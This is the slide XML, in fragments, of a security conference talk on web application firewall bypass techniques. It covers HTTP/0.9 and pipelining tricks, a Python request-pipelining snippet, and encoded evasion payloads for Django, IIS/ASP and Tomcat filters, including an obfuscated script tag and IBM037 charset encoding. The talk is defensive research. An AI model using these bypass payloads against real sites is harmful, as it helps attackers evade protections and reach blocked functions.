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84" r:id="rId3"/>
    <p:sldId id="266" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="339" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="301" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="296" r:id="rId16"/>
    <p:sldId id="297" r:id="rId17"/>
    <p:sldId id="303" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="298" r:id="rId20"/>
    <p:sldId id="338" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="311" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="334" r:id="rId29"/>
    <p:sldId id="335" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="316" r:id="rId33"/>
    <p:sldId id="314" r:id="rId34"/>
    <p:sldId id="315" r:id="rId35"/>
    <p:sldId id="337" r:id="rId36"/>
    <p:sldId id="306" r:id="rId37"/>
    <p:sldId id="289" r:id="rId38"/>
    <p:sldId id="291" r:id="rId39"/>
    <p:sldId id="292" r:id="rId40"/>
    <p:sldId id="318" r:id="rId41"/>
    <p:sldId id="319" r:id="rId42"/>
    <p:sldId id="321" r:id="rId43"/>
    <p:sldId id="322" r:id="rId44"/>
    <p:sldId id="307" r:id="rId45"/>
    <p:sldId id="323" r:id="rId46"/>
    <p:sldId id="324" r:id="rId47"/>
    <p:sldId id="325" r:id="rId48"/>
    <p:sldId id="326" r:id="rId49"/>
    <p:sldId id="327" r:id="rId50"/>
    <p:sldId id="308" r:id="rId51"/>
    <p:sldId id="328" r:id="rId52"/>
    <p:sldId id="329" r:id="rId53"/>
    <p:sldId id="330" r:id="rId54"/>
    <p:sldId id="331" r:id="rId55"/>
    <p:sldId id="333" r:id="rId56"/>
    <p:sldId id="332" r:id="rId57"/>
    <p:sldId id="293" r:id="rId58"/>
    <p:sldId id="260" r:id="rId59"/>
    <p:sldId id="305" r:id="rId60"/>
    <p:sldId id="268" r:id="rId61"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="987425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3C4"/>
    <a:srgbClr val="057FAF"/>
    <a:srgbClr val="055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74079" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="1574" y="53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78842" cy="344091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3" y="3"/>
            <a:ext cx="4278842" cy="344091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r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E64F0CB9-E4AE-4B60-9420-60050714952C}" type="datetime1">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>06/07/2018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13910"/>
            <a:ext cx="4278842" cy="344090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3" y="6513910"/>
            <a:ext cx="4278842" cy="344090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r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6D3FA680-036E-414E-B564-A124060A0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8312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78842" cy="344091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3" y="3"/>
            <a:ext cx="4278842" cy="344091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r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A20C4771-D52E-4940-976B-02A0A8405EED}" type="datetime1">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>06/07/2018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4" tIns="48007" rIns="96014" bIns="4800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300413"/>
            <a:ext cx="7899400" cy="2700338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="96014" tIns="48007" rIns="96014" bIns="4800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13910"/>
            <a:ext cx="4278842" cy="344090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3" y="6513910"/>
            <a:ext cx="4278842" cy="344090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r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0980D40E-C911-4E42-957F-349403BDE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8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501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30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026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639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991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998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15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7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08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is the other bypass category that I’m going to talk about today that is more interesting  from my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> point of view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25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27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178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142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982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4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35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0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4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178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D40E-C911-4E42-957F-349403BDEC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6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784E-799F-400D-A9DA-E4D72FEB4D42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1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6CD1-6F0C-4AF9-90C2-0E3AF8CECB35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B51-81F1-470A-B72D-4993686D33ED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1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DF92-537E-49F8-9114-61C925929E02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2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4E2A-9EF2-43D4-86CD-578FD3429D0C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EB25-88A5-436F-9CC3-41176AA6E2D8}" type="datetime1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5F6E-7771-48EF-B022-ACC8B2940DAA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/6/2018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8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2888-F84C-43AB-8C40-FA2D2349F6B0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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BA16-4F47-4BC0-B97C-FAE27D0C6795}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/6/2018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B042-9F3F-4914-82D8-2175AF9CD4F9}" type="datetime1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9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5D26-99E7-43F5-B572-03B6D03B6416}" type="datetime1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DB12-B51B-B14F-BE6F-B5F60D62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4F98-6C5F-4B50-B14C-5EFAC55CB23B}" type="datetime1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5DB12-B51B-B14F-BE6F-B5F60D62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1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irsdl/httpninja/blob/master/Generic%20Codes/web_request_socket.p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ccgroup/BurpSuiteHTTPSmuggle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5.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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74" y="1557906"/>
            <a:ext cx="3193556" cy="345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5225" y="217333"/>
            <a:ext cx="64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WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="44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Bypass Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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2213" y="979996"/>
            <a:ext cx="64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58C3C4"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>Using HTTP Standard and Web Servers’ Behaviour</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="58C3C4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8076" y="1555139"/>
            <a:ext cx="4823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Soroush Dalili (@irsdl), NCC Group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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2882"/>
            <a:ext cx="12192000" cy="4705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58" y="81639"/>
            <a:ext cx="3218360" cy="202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HTTP v0.9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Very old!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Supposedly one liner – only GET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No URL, No HTTP Version, No Headers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Support expectation removed </a:t>
            </a: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in HTTP/1.1 RFC 7230 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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048810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1073961" y="3644746"/>
          <a:ext cx="10041752" cy="2377440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3041822">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2650870698"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3623000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3725473058"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3376930">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3504402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Year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HTTP Version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effectLst/>
                        </a:rPr>
                        <a:t>RFC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114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  <a:effectLst/>
                        </a:rPr>
                        <a:t>1991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  <a:effectLst/>
                        </a:rPr>
                        <a:t>0.9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625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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1996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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1.0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effectLst/>
                        </a:rPr>
                        <a:t>RFC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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1945</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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193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effectLst/>
                        </a:rPr>
                        <a:t>1997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effectLst/>
                        </a:rPr>
                        <a:t>1.1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effectLst/>
                        </a:rPr>
                        <a:t>RFC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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2068 </a:t>
                      </a:r>
                    </a:p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effectLst/>
                        </a:rPr>
                        <a:t>    -&gt; RFC 2616 (1999)</a:t>
                      </a:r>
                    </a:p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effectLst/>
                        </a:rPr>
                        <a:t>        -&gt; RFC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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>7230-7235 (2014)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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64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effectLst/>
                        </a:rPr>
                        <a:t>2015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  <a:effectLst/>
                        </a:rPr>
                        <a:t>2.0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  <a:effectLst/>
                        </a:rPr>
                        <a:t>RFC 7540</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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684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6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1494" y="217333"/>
            <a:ext cx="725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HTTP v0.9 , What Can Go Wrong?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Interpretation/implementation issues since it’s old!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Still supported by all major web servers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Absolute URL in GET request with parameters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Apache Tomcat supports headers and POST requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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Inspired further by @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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regilero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 at DEFCON 24 (Hiding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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Wookiees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 in HTTP)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I was only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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1yr late </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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to rediscover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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some of it, good record for me! ;-)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lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i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GET http://http.ninja/?param1=value1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1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Sending HTTP v0.9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What to use?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telnet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netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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openssl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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Or write your own program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Client side web proxies? Not so useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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Burp Suite can send it but usually with no response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Probably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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blocked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 bad request by a middleware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 Pipelining to the rescue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406" y="3999122"/>
            <a:ext cx="3527785" cy="25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9766" y="217333"/>
            <a:ext cx="723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HTTP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Pipelining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15" y="1703516"/>
            <a:ext cx="7020905" cy="48870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21804" y="1703516"/>
            <a:ext cx="35869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Pipeline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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Recipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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HTTP/1.1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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT Condensed" panose="020B0606020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Connection: close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>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HTTP/1.0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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT Condensed" panose="020B0606020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT Condensed" panose="020B0606020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>: keep-alive</a:t>
            </a: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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>✔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Multiple requests in one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FIFO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Hop by Hop </a:t>
            </a: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  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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1844" y="217333"/>
            <a:ext cx="789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HTTP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Pipelining Example 1 - Request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495" y="1826179"/>
            <a:ext cx="761468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1844" y="217333"/>
            <a:ext cx="789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HTTP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Pipelining Example 2 - Request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374" y="1786615"/>
            <a:ext cx="686891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1325" y="217333"/>
            <a:ext cx="736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HTTP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Pipelining – Burp Suite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1062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No “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT Condensed" panose="020B0606020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Accept-Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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” to get text, CRLF in the end, mind the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT Condensed" panose="020B0606020104020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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” header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="057FAF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99" y="2466362"/>
            <a:ext cx="10320281" cy="43251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8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6926" y="217333"/>
            <a:ext cx="828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HTTP Pipelining + HTTP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0.9 Example 1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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1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admin</a:t>
            </a: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” is blocked in the path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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 0.9 has not been disabled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URL encoding and normal HTTP pipelining cannot bypass it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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super secure stuff!)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Directory traversal techniques e.g. “/foo/../admin” will not help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51" y="3706367"/>
            <a:ext cx="6341371" cy="2264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38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4151" y="217333"/>
            <a:ext cx="857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HTTP Pipelining + HTTP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0.9 Example 2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Abusing Apache Tomcat full header support</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Burp Suite adds an additional spacing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CR (0x0D) can be used instead of CR+LF (0x0D+0x0A)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65" y="3490509"/>
            <a:ext cx="11488263" cy="28470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64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HTTP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Pipelining – Python DIY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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a: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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>github.com/irsdl/httpninja/blob/master/Generic%20Codes/web_request_socket.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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6717" y="2305655"/>
            <a:ext cx="11696239" cy="3754874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req1_http_1_1 = RequestObject(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'GET'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'http://asitename.com:8080/sum.jsp?a=1&amp;b=1&amp;c=2&amp;d=2'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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="1" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="A9B7C6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req2_http_1_0 = RequestObject(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'POST'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'http://asitename.com:8080/sum.jsp?a=3&amp;b=3'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'c=4&amp;d=4'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'Content-Type'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'application/x-www-form-urlencoded'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'Content-Length'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'7'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A492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autoContentLength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8888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A492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HTTPVersion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"HTTP/1.0"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req3_http_0_9 = RequestObject(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'POST'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'http://asitename.com:8080/sum.jsp?a=5&amp;b=5'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'c=6&amp;d=6'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'Content-Type'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'application/x-www-form-urlencoded'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noProof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400" noProof="1" smtClean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A492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autoContentLength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8888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A492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HTTPVersion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joinedReqs = [req1_http_1_1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req2_http_1_0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req3_http_0_9]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pipelineResult = RequestObjectsToHTTPPipeline(joinedReqs)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1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pipelineResult</a:t>
            </a:r>
            <a:b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1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SendHTTPRequestBySocket(pipelineResult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req1_http_1_1.targetName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req1_http_1_1.targetPort)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="14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96507" y="217333"/>
            <a:ext cx="320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Today’s Menu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235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 smuggling like real smugglers!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Old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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but forgotten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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techniques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Eyes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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watering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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yummy HTTP requests!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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480" y="3690053"/>
            <a:ext cx="32480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601" y="1653872"/>
            <a:ext cx="122112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>
                    <a:lumMod val="95000"/>
                  </a:schemeClr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Request Mutation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr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2566" y="217333"/>
            <a:ext cx="769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Request Mutation Category</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Using known &amp; unknowns features!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="24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Requires lots of test-cases, fuzzing, behaviour analysis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Depends on the environment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web servers, web handlers, proxies,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Examples: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Duplicate parameters (HPP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400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Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="24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or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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parameters Evasion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Misshaped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b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Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1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10" name="Picture 8" descr="dotnet_logo.jpg (350×20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407" y="5209404"/>
            <a:ext cx="1470722" cy="8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microsoft_asp.gif (295×14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232" y="4461788"/>
            <a:ext cx="1664433" cy="80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500px-PHP-logo.svg.png (500×27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62" y="3221988"/>
            <a:ext cx="1217292" cy="6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jsp-file-format-symbol_318-45781.jpg (338×338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58" y="4166748"/>
            <a:ext cx="889855" cy="88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2000px-Tomcat-logo.svg.png (2000×133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422" y="3540975"/>
            <a:ext cx="1214451" cy="8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python-django-logo.jpg (1280×720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27" y="2522184"/>
            <a:ext cx="1080000" cy="6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asf_logo.png (3495×1417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464" y="1954659"/>
            <a:ext cx="1080000" cy="43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iis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272" y="5262847"/>
            <a:ext cx="1969724" cy="19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ginx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843313" y="3374370"/>
            <a:ext cx="1389635" cy="31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5224" y="217333"/>
            <a:ext cx="743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Features from RFC </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Should be known by WAFs… (hopefully by all of them)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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Read the boring RFC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Always look for changes in different RFCs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Possible canonical issues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Look for vague statements, "RECOMMENDED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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", "MAY", and "</a:t>
            </a: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OPTIONAL“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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.g.: Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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folding in headers (obsoleted by rfc7230)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Multiline headers, starts with CR/LF followed by a horizontal tab or space character!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Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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I’ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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used in the past to bypass filtering (not a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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WAF though)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Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>GET /page.do?p1=v1 HTTP/1.1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Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Host:  	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Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>        www.filtered.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Custom Implementation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The ones that can actually make a WAF bleed</a:t>
            </a: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!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Fuzzing is the key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Not standards and are technology specific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Examples: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Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>bypass - Python Django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&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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Payload bypass - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>IIS, ASP Classic</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/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&lt;script&gt; == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%s%cr%u0131pt&gt;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Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>bypass - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Apache Tomcat </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>path1/path2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/ == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/path1;foo/path2;bar/; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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Content Encoding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Abusing the power of “charset” encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0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Can </a:t>
            </a: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be used in </a:t>
            </a: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requests not just responses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Useful for ASCII characters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Might corrupt Unicode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Useful for server-side issues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Not possible to use it normally via a browser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Examples</a:t>
            </a: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application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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x-www-form-urlencoded;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>=ibm037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multipart/form-data</a:t>
            </a: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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>charset=ibm037</a:t>
            </a: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,boundary=blah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multipart/form-data; boundary=blah ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>charset=ibm037</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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7427" y="217333"/>
            <a:ext cx="730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Request Encoding is Challenging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Implemented differently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All at least supports IBM037</a:t>
            </a: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, IBM500, cp875, and </a:t>
            </a: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IBM1026 (all very similar)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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822549"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="973904" y="3207645"/>
          <a:ext cx="1024186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776">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2661869282"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1355074">
